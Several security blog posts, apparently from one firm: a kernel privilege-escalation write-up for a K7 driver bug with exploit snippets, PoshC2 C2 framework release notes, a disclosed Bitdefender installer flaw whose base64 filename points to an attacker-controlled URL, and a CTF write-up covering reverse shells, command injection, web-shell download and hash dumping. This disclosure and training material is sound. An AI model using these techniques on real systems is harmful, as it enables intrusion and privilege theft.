Privilege Escalation via a Kernel Pointer Dereference (CVE-2017-18019)

A little while ago, I discovered a vulnerability, CVE-2017-18019, affecting a kernel driver of multiple K7 Computing security products, as well as the products of Defenx, both for Windows.  Both were affected because they were using the same anti virus engine, and both are now patched.

The proof of concept was based on an invalid kernel pointer dereference, which led to a blue screen of death.  That research and the subsequent coordinated disclosure process were, at the time, sponsored and handled by SecuriTeam.  It turns out that the proof of concept could be exploited further, and turned into local privilege escalation.  So, with the permission of SecuriTeam, I decided to create a write-up of that local privilege escalation development process.

Targeting

This article targets the following 64-bit Windows versions: Windows 7 SP1 – Windows 10 v1809.

A Medium integrity level is required in order to exploit this vulnerability in the way that is demonstrated through this article. In order to exploit this from a Low integrity level, you will have to do extra work in order to leak some kernel pointers. This can be done either though other IOCTLs handlers of the target driver itself, or through other Windows driver kernel memory leak bugs.

Bug Analysis

The root cause of this issue is that the author of the following function trusts a pointer to read data from, originating from a user-supplied input buffer, as long as it references an address inside the kernel address space.

The vulnerable function fetches a pointer from the IOCTL’s input buffer and checks if it is greater or equal to nt!MmHighestUserAddress (0x00007ffffffeffff in x64). If that’s true, then the function will proceed by dereferencing that pointer and evaluating the first byte located at that memory address.

Clearly, the purpose (even though the implementation is buggy) of this check is to verify that the pointer address from where further information will be read resides in kernel memory of which, from the developer’s perspective, its virtual address and contents are not supposed to be known and controlled by the user. This, of course, is not entirely true because kernel object addresses may be leaked, and also they may reference directly or indirectly user-supplied data.

The following screenshot shows (in grouped nodes) what we described above.

Figure 1 – Verify it is a kernel pointer.

We can easily crash the host by supplying an arbitrary kernel pointer that references a non-allocated memory page.

The following image shows the output from Windbg the moment the memory access violation occurs.

Figure 2. Arbitrary kernel pointer dereference.

Further Analysis

What we know at this point is that we have a denial of service bug that can be triggered by any user in order to crash the host. So, we analysed this function further in order to find out if there is something more that we can do with it.

The following graph-view screenshot continues directly from what is shown in Figure 1.

Figure 3. Kernel memory buffer data checks.

Assuming that RCX points to a valid kernel address where the first byte is 0x4B, so that the previous check succeeds (cmp byte ptr [rcx], 4Bh), we arrive at the second part of the vulnerable function as shown above.

Here we notice further byte value checks, and specifically the second byte of the buffer referenced by RCX should be 0xFF in order to access the final part of our analysis.

Figure 4. Arbitrary Function Pointer Call.

A couple of pointer dereferences later, we see that the function is treating the last one as a function pointer. We also notice that the first and second parameters passed to RCX and RDX respectively can also be controlled.

To be more specific, the first parameter is taken from the buffer referenced by the arbitrary kernel pointer that we control, and the second one is pointing inside our user-input buffer that is defined through the call to DeviceIoControl function.

Setting things up

At this point, we have all the information we need in order to proceed with the exploitation of the vulnerability. To do that, we must know the address of a kernel object and also control its contents, to a certain extent. As we discussed, the initial pointer from where the rest of data is read leading to a function pointer called, must reference an address inside the kernel address space. This is also the developer’s assumption around the safety of that decision.

In a previous article we talked about Private Namespaces and the ability to insert user-defined data in the body of the associated kernel object. We will be using this type of objects in order to exploit the vulnerability, as they can be used reliably in this case as well.

In order to exploit this vulnerability, we will be using two kernel objects of the aforementioned type. The first object will be used for controlling the subsequent pointer dereferences that allow us to call an arbitrary function pointer, while the second object will be used in order to control the initial kernel pointer check that must reference a known kernel object in memory (first object).

Exploitation in Windows 7 SP1 x64

In the absence of exploitation mitigation such as SMEP (Supervisor Mode Execution Protection), taking advantage of this vulnerability is quite straight forward. We can execute our payload function in userland without taking any additional steps, such as temporarily disable SMEP. We just need to control the instruction pointer and that would be enough.

To start with, we will create a Private Namespace object using a random boundary name and we will use NtQuerySystemInformation function to leak its address.

Figure 5. 1st Object (Win7 SP1 x64).

Then, we will create another object of the same type with a crafted boundary name.

The first and second bytes must be 0x4B and 0xFF respectively (see Figures 1 and 3) to satisfy the byte value checks. Also, in the offset 0x0A (Figure 4 – first pointer dereference) of the crafted boundary name, we will be inserting the address of the first object + the distance in bytes (0x1a0) between that address and the location of the boundary name in that object + an arbitrary offset (0x1A) that contains a value that can be translated to a userland pointer, which satisfies the proof of concept for this version of Windows. Note that we take into account that at the result of the previous calculation, the value 0x0C will be added in order to reach the userland pointer value (Figure 4 – second pointer dereference).

Figure 6. 2nd Object (Win7 SP1 x64).

Let’s have a closer look at how these two objects are ‘inter-connected’.

Figure 7. Objects Interconnection (Win7 SP1 x64).

Finally, we can see the function pointer being called, in order to execute our payload at address 0x1010000.

Figure 8. Call Payload-Function Pointer (Win7 SP1 x64).

Exploitation in Windows 8.1 – 10 v1809 x64

In more recent Windows versions, exploiting a kernel driver bug is more challenging due to exploitation mitigations that have been added. In this case, we take control over the execution flow by calling an arbitrary function. However, due to the SMEP we are not able to directly execute code that resides in the user address space from kernel mode, so we will have to take another approach.

A common solution is to attempt to temporarily disable SMEP by clearing the 20th bit in CR4 register of a specific processor and lock our threads execution to only run on that one, so that we can execute our payload in userland as before. However, we would have to restore CR4 in order to avoid KPP (Kernel Patch Protection/PatchGuard) killing the host.

Another way, which we will be using in this write-up, is to take advantage of the execution flow control in order to turn it into a “write-what-where” primitive, which will enable us to modify arbitrary data in kernel memory. Once that is achieved, there are, again, two common ways of taking advantage of this in order to elevate our privileges.

The first method is to overwrite with a NULL value the SD (Security Descriptor) pointer in the object header of an elevated process running as SYSTEM. This will allow a non-privileged process to inject and execute malicious code in the same security context. However, this method will only work up to Windows 10 v1511 (Build 10586), as described in this article.

Another way to take advantage of a “write-what-where” primitive is to enable privileges in the primary token of a non-privileged process in order to enable it to again inject and execute code in the security context of a process running as SYSTEM. This method still works fine, but it requires a minor modification from Windows 10 v1709 (Build 15063) onwards, as described here. What we are about to describe here can also be used in Windows 7.

Going back to what we have described so far, we have noted that we are also able to control the first two parameters (see Figure 4) passed in RCX and RDX respectively, once our arbitrary function is called. We are going to take advantage of this capability in a moment.

In this case, we first need to leak the address of the primary token of our process, where will be enabling additional privileges. We will be using that address as the target of our exploitation primitive. As in Windows 7, NtQuerySystemInformation can be used for the same purpose from the standard ‘Medium Integrity’ of a user process in order to leak the kernel object and function addresses that we will be using.

We will then create our first Private Namespace object with a custom boundary name, where the first 8 bytes will be set to the kernel address that we will be using as our ‘gadget’ to modify arbitrary kernel data. So, instead of executing a payload in userland, we will be redirecting the execution to kernel function, nt!RtlCopyLuid that will enable us to modify arbitrary kernel data.

Figure 9. nt!RtlCopyLuid.

Since we control both the RCX and RDX registers, we can use this function to complete our “write-what-where” primitive.

We will be needing, again, a second Private Namespace object with a custom boundary name which at offset 0x0A of the name data (Figure 8 – first pointer dereference) must contain the address of the first object + the distance in bytes (0x1a0) between that address and the location of the boundary name in that object. Remember that at the first 8 bytes of the boundary name of the first Private Namespace object, we have inserted the address of nt!RtlCopyLuid. Note that as before, we must take into account that at the result of the previous calculation, the value 0x0C will be added in order to reach our arbitrary kernel function pointer value, loaded at the R10 register (Figure 8 – second pointer dereference).

So, this is how it should look:

*(ULONG_PTR*)(boundaryName + 0x0A) = customPrivNameSpaceAddress + boundaryNameOffsetInDireObject - 0x0C;

Then, we need to take control of the first two parameters.

The first parameter loaded in RCX is read again from our custom boundary name, at offset 2 (the first two bytes of our custom boundary name must be 0x4B,0xFF). So, we will be setting there the address of our process’ token object + the offset (0x40) to reach the nt!_SEP_TOKEN_PRIVILEGES structure member.

Figure 10. nt!_SEP_TOKEN_PRIVILEGES.

It should look as follows:

*(ULONG_PTR*)(boundaryName + 0x02) = tokenAddress + 0x40;

Finally, we can also control RDX since the value of R12 is copied over, which points at the address of our userland input buffer + 0x10 (see Figure 1 – 6th node). This is where we read the data from, to write into an arbitrary kernel address. In this case we will overwrite the ‘Enabled and ‘Present’ privileges members of the aforementioned structure (Figure 10).

It should look like this:

*(unsigned __int64*)(inputBuf + 0x10) = _ULLONG_MAX;

So, our exploit will have to reach the vulnerable function twice in order to complete the attack.

Figure 11. Objects Interconnection – Write-What-Where Primitive.

The image above shows how the two objects are ‘interconnected’ in order to complete our “write-what-where” primitive to finalize the exploit.

Conclusion

This was an interesting bug to examine and exploit, as it shows once more that no input data should ever be blindly trusted. From the developer’s perspective, trusting a kernel pointer to read data from, presumably out of user’s control, was a ‘safe’ decision to take. However, it turned out to become a serious vulnerability in multiple products of two different vendors that use the same SDK.

Introducing PoshC2 v4.8 – includes C# dropper, task management and more! – Part One

We recently released version 4.8 of PoshC2 Python, which includes a number of fixes and improvements that help facilitate simulated attacks. This is the first post in a series of posts that will include some of the details around the fixes and updates, alongside a number of other posts which will show some of the other cool features we have been working on in the background.

C Sharp (#)

As of PoshC2 version 4.6, a C# implant has been available. The main driver behind this implementation was to stay clear of System.Management.Automation.dll when an environment is heavily monitored and the EDR product can detect loaded modules inside a running process. Granted, not all EDR products are currently doing this, as it can create a hit on performance at the endpoint level, but its important to understand the OPSEC implications of running different C2 droppers.

This has been a work in progress since the release and is continually improving, and we believe this will be the way forward in months to come against advanced blue teams with a good detection and response capability across the organisation. Currently the implant is fully functional and allows an operator to load any C# assembly and execute this in the running process. This allows the user to extend the functionality massively because they’re able to load all the great modules out there in the wild, created by other infosec authors. The way this is loaded uses the System.Reflection namespace. The code can then be called using .NET reflection, which searches inside the current AppDomain for the assembly name and attempts to either run the entry point given or the main method of the executable. An example usage is as follows, for both run-exe and run-dll:

run-exe:

run-dll:

Task Management

One of the issues we’ve overcome in this release was around tracking tasks; there was no way to determine what output related to which issued command. This was largely due to the implant not using task ID’s that were tracked throughout the entire command process flow.

Typically, this was fine because you know what command you’re running, but when multiple people are working on the same instance, or if multiple similar commands are run, then it could be difficult to figure out what output came from which command. This also made tracking failed commands fairly difficult if not impossible to find. The following screenshots shows the output inside the C2Server and the CompletedTasks HTML file:

Figure 1: How commands were issued and returned against an implant

Figure 2: The old format of the tasks report

Furthermore, tasks were only logged in the database when the implant responded with some output. Now, tasks are inserted as soon as they are picked up by the implant with a start time, and updated with a completed time and the desired output when they return. This allows us to track tasks even if they kill the implant or error and never return, and to see how long they took. It also allows us to reference tasks by ID, allowing us to match them in the C2Server log and to only refer to the task by its ID in the response, decreasing message length and improving operational security. An example of the output is shown below:

Figure 3: The new task logging

The generated report then looks like this:

Figure 4: The new report format

User Logging

The astute amongst you will have noticed the new User column in the report above. Another improvement that has been made in relation to tracking tasks is user logging. Now when you start the ImplantHandler you are prompted for a username; it is possible to leave this blank if required, but when PoshC2 is being used as a centralised C2Server with multiple users it’s important to track which user ran which task as shown in the examples below:

Figure 5: You are now prompted for a username when you start the ImplantHandler

All tasks issued from that ImplantHandler instance will be logged as that user, both in the C2Server log and in the report.

Figure 6: If a username is set it is logged in the task output

Figure 7: The username is also logged for the task in the report

For scripting and/or ease of use, the ImplantHandler can also be started with the -u or --user option, which sets the username, avoiding the prompt:

python ImplantHandler.py --user "bobby b"

Beacon Timing

The way beacon sleep times were handled was inconsistent amongst implants, so now we’ve standardised it. All beacon times must now be in the format of value and unit, such as 5m, 10s or 2h. This is then displayed as such for all implant types in the ImplantHandler. As seen below, the fourth column states the current beacon time in seconds, whereas now we show only the output in the newer format.

Figure 8: The old beacon time format

Figure 9: The new beacon time format

Validation has also been added for these, so attempting to set an invalid beacon time will print a suitable error message and do nothing.

Figure 10: The validation message if an invalid format is set

We’ve also changed the implant colour coding so that they are only flagged as timing out if they haven’t checked in for a multiple of their beacon time, as opposed to a hard coded value.

Previously the implants would be coloured as yellow if they hadn’t checked in for 10 minutes or more, and red for 60 minutes or more. Now they are coloured yellow if they have not checked in for 3x beacon time, and red for 10x beacon time, granting far more accurate and timely feedback to the operator.

Figure 11: Implant colour coding has been improved so that the colour is dependent on the beacon time

C2Viewer

The C2Viewer was a legacy script used to just print the C2Server log, useful when multiple people want to be able to view and manipulate the output independently.

There were a few issues with the implementation however, and there was a possibility that it would miss output as it polled the database. Additionally, as this was an additional script, it added maintenance headaches for updates to task output.

This file has now been removed, and instead if you want to view the output in the same way, we recommend that you run the C2Server and pipe it to a log file. You can print the log to stdout and a log file using tee:

python -u C2Server.py | tee -a /var/log/poshc2_server.log

This output can then be viewed and manipulated by anyone, such as by using tail:

tail -f -n 50 /var/log/poshc2_server.log

This method has the added benefit of storing all server output. While all relevant data is stored in the database, having a backup of the output actually seen in the log during usage can be extremely useful.

Further details can be found in the README.md.

Internal Refactoring

We’re also making strides to improve the internals for PoshC2, refactoring files for clarity, and cutting cyclic dependencies. We aim to modularise the entire code base in order to make it more accessible and easier to maintain, including making changes, but as this is a sizeable change we’ll be doing it incrementally to limit the impact.

Conclusion

There have been quite a few changes made, and we’re aiming to not only improve the technical capabilities of PoshC2, but also the usability and maintainability.

Naturally, any changes come with a risk of breaking things no matter how thorough the testing, so please report any issues found on the GitHub page at: https://github.com/nettitude/PoshC2_Python.

The full list of changes is below, but as always keep an eye out on the changelog as we update this with any changes for each version to make tracking easier. This is the first blog of a series of blogs on some additional features and capability within PoshC2. Stay tuned for more information.

  • Insert tasks when first picked up by the implant with start time
  • Update task when response returned with output and completed time
  • Log task ID in task sent/received
  • Add ability to set username and associate username to tasks issued
  • Print user in task information when the username is not empty
  • Improved error handling and logging
  • Rename CompletedTasks table to Tasks table
  • Method name refactoring around above changes
  • Pull out implant cores into Implant-Core.py/.cs/.ps1
  • Rename 2nd stage cores into Stage2-Core.py/.ps1
  • Stage2-Core.ps1 (previously Implant-Core.ps1 ) is no longer flagged by AMSI
  • Use prepared statements in the DB
  • Refactoring work to start to break up dependency cycle
  • Rename DB to Database in Config.py to avoid name clashes
  • Pull some dependency-less functions into Utils.py to aid dependency management
  • Fix download-file so that if the same file is downloaded multiple times it gets downloaded to name-1.ext name-2.ext etc
  • Adjust user/host printing to always be domain\username @ hostname in implants & logs
  • Fix CreateRawBase payload creation, used in gzip powershell stager and commands like get-system
  • Added ImplantID to Tasks table as a foreign key, so it’s logged in the Tasks report
  • Added Testing.md for testing checklist/methodology
  • Fix Get-ScreenshotAllWindows to return correct file extension
  • Fix searchhelp for commands with caps
  • Implant timeout highlighting is now based on beacon time – yellow if it’s not checked in for 3x beacon time and red if not checked in for 10x beacon time
  • Setting and viewing beacon time is now consistent across config and implant types – always 50s/10m/1h format
  • Added validation for beacon time that it matches the correct format
  • Fix StartAnotherImplant command for python implant
  • Rename RandomURI column in html output to Context, and print it as domain\username @ hostname
  • Move service instructions to readme so that poshc2.service can just be copied to /lib/systemd/system
  • Removed C2Viewer.py and added instructions for same functionality to readme just using system commands

CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:

  • https://cloudgz-ecs.gravityzone.bitdefender.com/Packages/BSTWIN/0/_9JZBM/installer.xmlxFFlang=en-US

Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe”

The base64 in that filename was modified to contain the URL:

  • http://thiscantbetrue.com/installer.xml

We reran the installer and the results are shown below.

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point, we used a simple trick to skip looking at encrypted data passing over HTTPS, and so we restored the original download URL back to the installer.xml, but we replaced HTTPS with HTTP instead.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that will be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called “Installer.exe”: <run_command params=”” proc=”Installer.exe” />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.

Conclusion

We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be compromised by subsequently poor implementations.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new patched installers and went through a certificate revocation process of the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates are as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificates revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.

image1.jpeg

image2.jpeg

Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service to identify users of the system using the VRFY method to identify susan as a user on the system, as well as use the system to send email. Some time was given to the mail service to send email internally with no output.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the eventually discovered correct pair of credentials were passed to the server during multiple brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the version of Elasticsearch API 1.1.1, which allows for remote code execution. The exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, an exploit that adds the account firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags, however of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised key files. One of the more fun flags was saved in the user’s home directory Pictures/Wallpapers/Untitled.png, which was retrieved from the box; VNC was running on localhost and we saw a number of people port forwarding through the box but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\297b677f\x64.simple.binary-main.png

We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\e73333f3\x64.simple.binary-authenticate.png

It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the users input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.

Knowing that comparison algorithm, one could reverse it until this challenges flag was identified. However, during the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:

C:\Users\jlopes\AppData\Local\Temp\vmware-jlopes\VMwareDnD\ff3353af\x64.hard.binary-functions.png

Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating XOR single-byte key. Every byte of the file was XOR’ed with a byte key, which is then incremented by 0x07. The original XOR byte key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:

  • superkai64@minecraft.net

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.

Access to a root shell was gain by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run the less program against the syslog file without requiring a password. Once a root shell was obtained, access to the CTF user’s password was gained from the .bash_history file. This user was defined within the sudoers file as having all root permissions. That account allowed us to access the SSH service bypassing the Jenkins service and gaining the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following requests file and fed this into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularity useful as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path.  Apparently there was a WordPress username – djohnston- embedded in the HTML comments somewhere, and that user has a password of Password1 for wp-admin.  Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenged included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we are able to add a semi-colon to end the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell. This was then downloaded to the WordPress server by using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo groups, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the applications MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reversed proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these are POSTed to the /Login page. This set a cookie called session and then a redirect to /Chat was triggered. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookies value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that the one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within in a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of MAC, utilising some form of strong sever side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickle’s” enough:

Ruby on Rails has gadgets for RCE via derserialization via the ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

